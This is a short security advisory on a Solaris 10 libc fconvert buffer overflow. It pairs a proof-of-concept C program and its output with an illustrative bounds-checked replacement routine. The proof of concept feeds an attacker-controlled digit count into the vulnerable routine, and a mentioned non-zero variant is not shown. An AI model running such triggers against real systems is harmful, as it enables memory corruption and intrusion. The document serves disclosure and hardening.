--- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---
The problem is in Sun Solaris 10 libc; OpenSolaris is not affected.
PoC:
---
#include <stdio.h>
#include <stdlib.h>
#include <floatingpoint.h>   /* Solaris header that declares fconvert() */

int main (int argc, char *argv[]){
    char number[10000];      /* caller-supplied output buffer, large on purpose */
    int a,b;                 /* decpt and sign results from fconvert() */
    if (argc < 2) return 1;  /* ndigit is taken from the command line */
    /* value 0.0, attacker-chosen ndigit; the overflow is inside libc, not in number[] */
    printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
    return 0;
}
0000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
---
With an argument of 512 this runs fine, because the value being converted is (double)0. With a non-zero value it crashes.
OK, let's use a non-zero value in jaja2.c
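The PoC feeds an attacker-controlled ndigit straight into libc's conversion routine, and the crash shows that the routine sizes its internal buffer without reference to ndigit. As an added example, not code from this advisory or from Solaris libc, here is a bounds-checked model of the same *cvt interface: it computes the length the digit string would need before writing anything, rejects an ndigit above an assumed policy limit, and refuses to write a result that would not fit the caller's buffer. The function name fconvert_checked, the CVT_MAX_NDIGIT limit of 512, the use of snprintf for digit generation and the sample values are all assumptions made for illustration.

```c
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed policy limit for this example; not a Solaris constant. */
#define CVT_MAX_NDIGIT 512

/*
 * Model of fconvert(): returns the digit string of `value` with `ndigit`
 * digits after the decimal point, sets *decpt to the position of the
 * decimal point and *sign to 1 for negative values. Unlike a fixed-size
 * internal buffer, the caller passes bufsize, and the function returns
 * NULL instead of overflowing when the result would not fit.
 */
char *fconvert_checked(double value, int ndigit, int *decpt, int *sign,
                       char *buf, size_t bufsize)
{
    if (!buf || bufsize == 0 || ndigit < 0 || ndigit > CVT_MAX_NDIGIT)
        return NULL;
    if (isnan(value) || isinf(value))
        return NULL;

    *sign = signbit(value) ? 1 : 0;
    double mag = fabs(value);

    /* First pass: measure the formatted length without writing anything. */
    int need = snprintf(NULL, 0, "%.*f", ndigit, mag);
    if (need < 0)
        return NULL;

    /* The digit string omits the '.', so it is one byte shorter when ndigit > 0. */
    size_t out_len = (ndigit > 0) ? (size_t)need - 1 : (size_t)need;
    if (out_len + 1 > bufsize)           /* +1 for the terminating NUL */
        return NULL;

    char *tmp = malloc((size_t)need + 1);
    if (!tmp)
        return NULL;
    snprintf(tmp, (size_t)need + 1, "%.*f", ndigit, mag);

    char *dot = strchr(tmp, '.');
    *decpt = dot ? (int)(dot - tmp) : need;

    /* Copy every character except the decimal point into the caller's buffer. */
    size_t j = 0;
    for (size_t i = 0; tmp[i] != '\0'; i++)
        if (tmp[i] != '.')
            buf[j++] = tmp[i];
    buf[j] = '\0';

    free(tmp);
    return buf;
}

/* Same shape as the advisory's PoC, but with a non-zero value and a checked call. */
int main(int argc, char *argv[])
{
    char number[10000];
    int decpt, sign;
    int ndigit = (argc > 1) ? atoi(argv[1]) : 512;   /* assumed default */
    char *r = fconvert_checked(3.25, ndigit, &decpt, &sign, number, sizeof number);
    if (!r) {
        fprintf(stderr, "ndigit %d rejected\n", ndigit);
        return 1;
    }
    printf("%s (decpt=%d sign=%d)\n", r, decpt, sign);
    return 0;
}
```

The two-pass snprintf is the point of the example: the required length is known before any byte is written, so ndigit can never drive a write past the end of a buffer the routine did not size for it. Running it with an argument of 10000 prints a rejection instead of crashing.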